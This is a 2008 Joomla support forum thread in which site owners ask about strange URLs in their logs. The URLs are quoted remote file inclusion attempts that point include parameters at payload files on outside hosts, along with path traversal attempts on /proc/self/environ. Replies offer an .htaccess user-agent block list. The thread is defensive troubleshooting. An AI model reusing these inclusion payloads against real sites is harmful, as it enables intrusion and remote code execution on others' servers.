A collection of strange links on my Joomla site

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
User avatar
ased
Joomla! Apprentice
Joomla! Apprentice
Posts: 15
Joined: Mon Oct 02, 2006 9:33 pm

A collection of strange links on my Joomla site

Postby ased » Mon Aug 11, 2008 12:57 am

Hi,

I found this in my site and i wounder whats going on , i'm using MyBlog from azrul as front page , when i put these links in the browser they took me to my front page but there are links to other sites !
How they done it ?
How to delet it and avoid it in the future.

Thanks for your help

The links :

mysite.com/index.php?view=page&amp;pagename=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt???

mysite.com/index.php?view=page&amp;pagename=http://student-x.com/test.txt?

.mysite.com/index.php?autoLoadConfig[333][0][autoType]=include&amp;autoLoadConfig[333][0][loadFile]=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt???

mysite.com/index.php?view=page&amp;pagename=http://www.mubune.com/plugins/safehtml/oye.txt??

wildazzjw
Joomla! Apprentice
Joomla! Apprentice
Posts: 8
Joined: Thu Oct 12, 2006 4:07 am

Re: hack attempt

Postby wildazzjw » Mon Sep 15, 2008 2:15 am

I also have this activity in my logs. A google search vaguely shows this as some sort of hack. Maybe for ZenCart? Not sure able to tell if anything was exploited. Does this work on Joomla?

//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00

//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14291
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: A collection of strange links on my Joomla site

Postby mandville » Mon Sep 15, 2008 2:31 am

it MIGHT do but my guess it was being called using the libwww bot, ban that in your htaccess and it should dramatically clear up these types of attacks
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
Jane Blonde
Joomla! Apprentice
Joomla! Apprentice
Posts: 41
Joined: Sat Aug 02, 2008 2:42 pm

Re: A collection of strange links on my Joomla site

Postby Jane Blonde » Mon Sep 29, 2008 10:33 am

how do I ban that, what is exact code

Code: Select all

SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot


That's what I found with google but is that it?

Should we ban other stuff too?

J

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14291
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: A collection of strange links on my Joomla site

Postby mandville » Mon Sep 29, 2008 11:12 am

thats basically correct , if you search this forum especially sxome of my posts, you will see the htaccess code i use to ban this and other bad bots
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14291
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: A collection of strange links on my Joomla site

Postby mandville » Mon Sep 29, 2008 10:09 pm

this is the sort of full htaccess code i meant, adapt to your own use.

Code: Select all

SetEnvIfNoCase User-Agent “^FlashGet” bad_bot
SetEnvIfNoCase User-Agent “^GetRight” bad_bot
SetEnvIfNoCase User-Agent “^GetWeb!” bad_bot
SetEnvIfNoCase User-Agent “^Go!Zilla” bad_bot
SetEnvIfNoCase User-Agent “^httplib” bad_bot
SetEnvIfNoCase User-Agent “^Indy Library” bad_bot
SetEnvIfNoCase User-Agent “^InfoNaviRobot” bad_bot
SetEnvIfNoCase User-Agent “^InterGET” bad_bot
SetEnvIfNoCase User-Agent “^Internet Ninja” bad_bot
SetEnvIfNoCase User-Agent “^LexiBot” bad_bot
SetEnvIfNoCase User-Agent “^libWeb/clsHTTP” bad_bot
SetEnvIfNoCase User-Agent “^libwww” bad_bot
SetEnvIfNoCase User-Agent “^libwww-perl” bad_bot
SetEnvIfNoCase User-Agent “^LinkextractorPro” bad_bot
SetEnvIfNoCase User-Agent “^Mozilla.*NEWT” bad_bot
SetEnvIfNoCase User-Agent “^Octopus” bad_bot
SetEnvIfNoCase User-Agent “^ProWebWalker” bad_bot
SetEnvIfNoCase User-Agent “^SuperBot” bad_bot
SetEnvIfNoCase User-Agent “^WebAuto” bad_bot
SetEnvIfNoCase User-Agent “^Wells Search II” bad_bot
SetEnvIfNoCase User-Agent “^Wget” bad_bot
SetEnvIfNoCase User-Agent “^wget” bad_bot
<Limit GET POST>
order allow,deny
allow from all
deny from env=bad_bot
</Limit>
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
Jane Blonde
Joomla! Apprentice
Joomla! Apprentice
Posts: 41
Joined: Sat Aug 02, 2008 2:42 pm

Re: A collection of strange links on my Joomla site

Postby Jane Blonde » Tue Sep 30, 2008 10:42 am

Wow! Now your talking, that's great Mandivile, I feel a lot safer!

When I searched your posts for .htaccess I mostly got this one!

JB

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14291
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: A collection of strange links on my Joomla site

Postby mandville » Tue Sep 30, 2008 11:08 am

NP - make sure mod_rewrite is on.
you will notice that a lot of libwww will start appearing in your logs marked "denied by server" or similar
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
Jane Blonde
Joomla! Apprentice
Joomla! Apprentice
Posts: 41
Joined: Sat Aug 02, 2008 2:42 pm

Re: A collection of strange links on my Joomla site

Postby Jane Blonde » Tue Sep 30, 2008 11:39 am

Code: Select all

RewriteEngine On

:)

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14291
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: A collection of strange links on my Joomla site

Postby mandville » Fri Oct 03, 2008 4:41 pm

just thought i would check if this code has helped and if not any other issues arised?
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
Jane Blonde
Joomla! Apprentice
Joomla! Apprentice
Posts: 41
Joined: Sat Aug 02, 2008 2:42 pm

Re: A collection of strange links on my Joomla site

Postby Jane Blonde » Fri Oct 03, 2008 5:41 pm

I have not had a problem since and am implementing it on other Joomla sites, thanks:)

User avatar
guysmiley
Joomla! Explorer
Joomla! Explorer
Posts: 497
Joined: Mon Sep 12, 2005 7:22 pm
Location: Ontario, Canada

Re: A collection of strange links on my Joomla site

Postby guysmiley » Sat Nov 15, 2008 1:20 pm

Greetings,

Thanks for this list ;)

If modsecurity is already catching it, am I burdening the server unnecessarily by adding these lines to my .htaccess?

IOW, should I add these lines to .htaccess if modsecurity is already nabbing them?

Thanks!


Return to “Security - 1.0.x”

Who is online

Users browsing this forum: No registered users and 10 guests